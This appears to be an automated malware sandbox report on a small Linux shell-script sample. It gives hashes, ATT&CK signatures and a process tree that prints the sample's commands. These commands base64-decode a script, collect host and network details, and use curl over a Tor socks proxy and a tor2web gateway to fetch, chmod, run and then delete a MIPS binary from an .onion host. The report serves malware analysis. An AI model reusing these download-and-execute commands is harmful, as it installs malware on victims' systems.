Analysis
max time kernel: 87s
max time network: 155s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 24/10/2024, 18:05
Static task: static1
Behavioral task behavioral1: sample 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118, resource debian9-mipsel-20240226-en
General
Target: 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
Size: 1KB
MD5: 74accae8c7e0093939ab4e0cd1c2a7fd
SHA1: ae3b26988c72634e3f0daeb6486332530ba58324
SHA256: d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea
SHA512: 7e784dce4b2fa0f5a3659ccf7af43b3f4886bd5ea32acb26a60ccad38c5bc918789d7d01f2090bd3a053d783c6eba4571865f7e54de106232d83cae57e4172b9
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
779  chmod
725  chmod

Executes dropped EXE 1 IoCs
ioc  pid  Process
/tmp/i  727  i

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
3  checkip.amazonaws.com
10  checkip.amazonaws.com

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs
Adversaries may deobfuscate or decode files or information to evade detection mechanisms.
pid  Process
706  base64

Reads runtime system information
description  ioc  Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/filesystems  ls
File opened for reading  /proc/filesystems  id
File opened for reading  /proc/filesystems  crontab
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/maps  awk
File opened for reading  /proc/self/maps  awk
File opened for reading  /proc/filesystems  ls
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/maps  awk
File opened for reading  /proc/self/maps  awk
File opened for reading  /proc/filesystems  crontab
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl

System Network Configuration Discovery 1 TTPs 7 IoCs
Adversaries may gather information about the network configuration of a system.
pid  Process
774  curl
806  curl
816  ip
826  curl
755  curl
764  ip
772  curl

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description  ioc  Process
File opened for modification  /tmp/i  bash
Processes
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118  cmdline: /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118  PID: 699
  /bin/bash  cmdline: bash  PID: 707
    - Writes file to tmp directory
    /usr/bin/cut  cmdline: cut -d: -f6  PID: 713
    /usr/bin/id  cmdline: id -u  PID: 715
      - Reads runtime system information
    /bin/grep  cmdline: grep x:0: /etc/passwd  PID: 712
    /usr/bin/head  cmdline: head -n 1 /tmp/.X11-unix/01  PID: 721
    /bin/ls  cmdline: ls /proc//status  PID: 723
      - Reads runtime system information
    /bin/chmod  cmdline: chmod +x ./i  PID: 725
      - File and Directory Permissions Modification
    /tmp/i  cmdline: ./i  PID: 727
      - Executes dropped EXE
    /bin/rm  cmdline: rm -f i  PID: 728
    /bin/grep  cmdline: grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"  PID: 734
    /usr/bin/tr  cmdline: tr " " "\\n"  PID: 735
    /usr/bin/sort  cmdline: sort -uR  PID: 737
    /bin/grep  cmdline: grep -Ev "[.]0"  PID: 736
    /usr/bin/head  cmdline: head -n 1  PID: 738
    /usr/bin/curl  cmdline: curl -4fsSLkA- -m200 "https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in"  PID: 733
      - Reads runtime system information
    /bin/uname  cmdline: uname -m  PID: 747
    /bin/date  cmdline: date  PID: 750
    /usr/bin/md5sum  cmdline: md5sum  PID: 751
    /usr/bin/cut  cmdline: cut -f1 -d-  PID: 752
    /usr/bin/curl  cmdline: curl -4fsSLk checkip.amazonaws.com  PID: 755
      - Reads runtime system information
      - System Network Configuration Discovery
    /usr/bin/whoami  cmdline: whoami  PID: 760
    /bin/uname  cmdline: uname -m  PID: 761
    /bin/uname  cmdline: uname -n  PID: 762
    /sbin/ip  cmdline: ip a  PID: 764
      - System Network Configuration Discovery
    /bin/grep  cmdline: grep "inet "  PID: 765
    /usr/bin/md5sum  cmdline: md5sum  PID: 767
    /usr/bin/awk  cmdline: awk "{print \$1}"  PID: 768
      - Reads runtime system information
    /usr/bin/awk  cmdline: awk "{print \$2}"  PID: 766
      - Reads runtime system information
    /usr/bin/base64  cmdline: base64 -w0  PID: 771
    /usr/bin/crontab  cmdline: crontab -l  PID: 770
      - Reads runtime system information
    /usr/bin/curl  cmdline: curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_  PID: 772
      - Reads runtime system information
      - System Network Configuration Discovery
    /usr/bin/curl  cmdline: curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_  PID: 774
      - Reads runtime system information
      - System Network Configuration Discovery
    /bin/chmod  cmdline: chmod +x ./e8eb0a2cdf54c3ac6d6c2fd3f5796222  PID: 779
      - File and Directory Permissions Modification
    /tmp/e8eb0a2cdf54c3ac6d6c2fd3f5796222  cmdline: ./e8eb0a2cdf54c3ac6d6c2fd3f5796222  PID: 780
    /bin/rm  cmdline: rm -f ./e8eb0a2cdf54c3ac6d6c2fd3f5796222  PID: 781
    /usr/bin/head  cmdline: head -n 1 /tmp/.X11-unix/01  PID: 782
    /bin/ls  cmdline: ls /proc//status  PID: 783
      - Reads runtime system information
    /bin/grep  cmdline: grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"  PID: 788
    /usr/bin/tr  cmdline: tr " " "\\n"  PID: 789
    /usr/bin/sort  cmdline: sort -uR  PID: 791
    /usr/bin/head  cmdline: head -n 1  PID: 792
    /usr/bin/curl  cmdline: curl -4fsSLkA- -m200 "https://dns.twnic.tw/dns-query?name=relay.tor2socks.in"  PID: 787
      - Reads runtime system information
    /bin/grep  cmdline: grep -Ev "[.]0"  PID: 790
    /bin/uname  cmdline: uname -m  PID: 798
    /bin/date  cmdline: date  PID: 801
    /usr/bin/md5sum  cmdline: md5sum  PID: 802
    /usr/bin/cut  cmdline: cut -f1 -d-  PID: 803
    /usr/bin/curl  cmdline: curl -4fsSLk checkip.amazonaws.com  PID: 806
      - Reads runtime system information
      - System Network Configuration Discovery
    /usr/bin/whoami  cmdline: whoami  PID: 811
    /bin/uname  cmdline: uname -m  PID: 812
    /bin/uname  cmdline: uname -n  PID: 814
    /sbin/ip  cmdline: ip a  PID: 816
      - System Network Configuration Discovery
    /bin/grep  cmdline: grep "inet "  PID: 817
    /usr/bin/md5sum  cmdline: md5sum  PID: 819
    /usr/bin/awk  cmdline: awk "{print \$2}"  PID: 818
      - Reads runtime system information
    /usr/bin/awk  cmdline: awk "{print \$1}"  PID: 820
      - Reads runtime system information
    /usr/bin/crontab  cmdline: crontab -l  PID: 823
      - Reads runtime system information
    /usr/bin/base64  cmdline: base64 -w0  PID: 824
    /usr/bin/curl  cmdline: curl -4fsSLkA- -m200 -x socks5h://65.108.216.128:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./4db8a69be99c4cf3f0388ff8c87b69b0 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_d41d8cd98f00b204e9800998ecf8427e_  PID: 826
      - Reads runtime system information
      - System Network Configuration Discovery
  /usr/bin/base64  cmdline: base64 -d  PID: 706
    - Deobfuscate/Decode Files or Information
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 5B
MD5: f4b524261fce06c1fbd10b4681ad0b97
SHA1: c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA256: 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512: ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449